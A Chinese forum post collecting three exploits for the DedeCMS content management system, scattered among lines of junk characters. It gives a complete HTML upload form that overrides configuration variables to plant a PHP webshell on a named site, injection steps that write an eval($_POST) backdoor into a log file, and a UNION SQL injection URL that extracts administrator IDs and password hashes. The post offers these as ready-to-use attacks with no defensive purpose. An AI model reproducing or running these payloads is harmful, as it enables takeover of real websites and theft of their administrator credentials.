$ a" n* I. @" d1 R$ L4 x# j9 b" q. q/ a$ q1 E" N% U
; c$ A/ d: b6 N2 U# X
1 w5 W: z: ]+ F c7 }$ G
4 z" d) n6 m) }7 \) `7 f+ A' n
$ l8 d- R7 w- f1 a5 q* B
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞/ H* s( L% o3 k( _0 p2 p1 o8 L! n
<html>1 d% s0 G" p' F! _8 l
<head>% l7 m3 h# d# Z o$ g* s+ @
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>% E9 @0 q2 A6 H' b
</head>$ k. c \1 H" h ]* m
<body style="FONT-SIZE: 9pt">1 v: e/ H3 }! g
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
0 d1 n4 y' r0 A<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>1 j* {5 @6 L8 M5 y# I/ x, f
<input type='hidden' name='activepath' value='/data/cache/' />
L" m. Y9 F0 ^/ Y z/ c# x0 u<input type='hidden' name='cfg_basedir' value='../../' />
7 h- i- P( f% ]6 }3 n7 p<input type='hidden' name='cfg_imgtype' value='php' />7 X) ]7 D6 Q3 x( t; B* I- w
<input type='hidden' name='cfg_not_allowall' value='txt' />4 r; x) Y; u* u: I& c
<input type='hidden' name='cfg_softtype' value='php' />- Y' \& j# ]" D' ?# a$ z4 V0 ~
<input type='hidden' name='cfg_mediatype' value='php' />
4 ~& c7 x; Z/ l/ P4 I. }<input type='hidden' name='f' value='form1.enclosure' />; \, F$ |( h* _4 u4 L
<input type='hidden' name='job' value='upload' />
! g6 S8 e/ ^; W* A% Q; o+ o<input type='hidden' name='newname' value='fly.php' />2 P. [# X" L. I
Select U Shell <input type='file' name='uploadfile' size='25' />
/ c& f) o' P( U. I<input type='submit' name='sb1' value='确定' />' O/ ~6 J! @) f+ u% A" Q' o a( l
</form>2 X- x. j( Z" s- F% B3 Y
<br />It's just a exp for the bug of Dedecms V55...<br />& C4 d( J8 l* ]8 R# j- I
Need register_globals = on...<br />5 x' E* J1 a. W0 E- P
Fun the game,get a webshell at /data/cache/fly.php...<br />
! p8 ~* D: V5 ?7 h, q5 |2 H</body> G6 c {' d" L w8 |
</html>9 t$ t# F) U7 D) o' z3 W
; N! f1 h9 {4 x4 }3 E) ~# l8 j- f& f+ s
; ~. p1 R2 z: F5 {/ |& A! H, x7 W0 B4 C [. i: S/ G3 R# ^- @) q
% R6 I4 g0 u' h4 Y# u- A
* z1 {3 ]9 I4 r& \( u, U
9 W' o+ [6 \' J3 p5 O- E1 [) O8 ~+ @: h/ s' Z% Z
# A3 @ W& E0 p: L z' K. c: G2 G: e; w. F
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞2 K, y, J9 } [' n1 u
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。/ {9 b* r2 L; t9 N, P: n) d: O
1. 访问网址:* A) A' v1 X) t2 ? ?7 R) K: C; O
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
* A, v% C4 K, {9 B5 i; d可看见错误信息
$ H7 u1 \, n ^0 S2 ?9 Y* s q
4 O9 e& N2 E, K
0 E) X6 b n# ^2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。# T8 B7 \' A ^
int(3) Error: Illegal double '1024e1024' value found during parsing
, b8 I2 w; n1 v6 QError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
8 T, O8 b5 L4 h) Z* J' f% I* ]* Y# M+ G, O. R2 x
5 f. C0 x' [0 h
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
2 V/ p, b; w" `1 u2 e0 ^
$ L1 S; b/ m! K
: j5 i. f+ x) V% Z( B<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
. X# D v& r o0 i/ S* C1 p* s2 L& d% d: y" `# n
( S& s% j0 Z% P" w* o按确定后的看到第2步骤的信息表示文件木马上传成功.; K( Y1 k5 q# j4 Q) c! u
( L- W4 i0 ?8 p
8 b* D! G) K8 U3 f. d( w& ]5 N6 z1 x, T
" C$ L& \1 n2 t0 u, u: A- Q2 Z3 K# p9 N8 ~: H A& f
T) T4 G u# |, S4 ]4 ^& ^
$ U6 L, j: B, b
1 S$ L1 ~' ?! ~( P. V- ^8 e% J+ _4 Z/ }
( s5 K. `5 e+ I: K; w6 z/ |$ z9 _7 f
& S4 x) K' ^. F- ]& M: ?织梦(DedeCms)plus/infosearch.php 文件注入漏洞
8 q, {, u, Z; |) p+ A% y$ h5 A Vhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
分享
支持
反对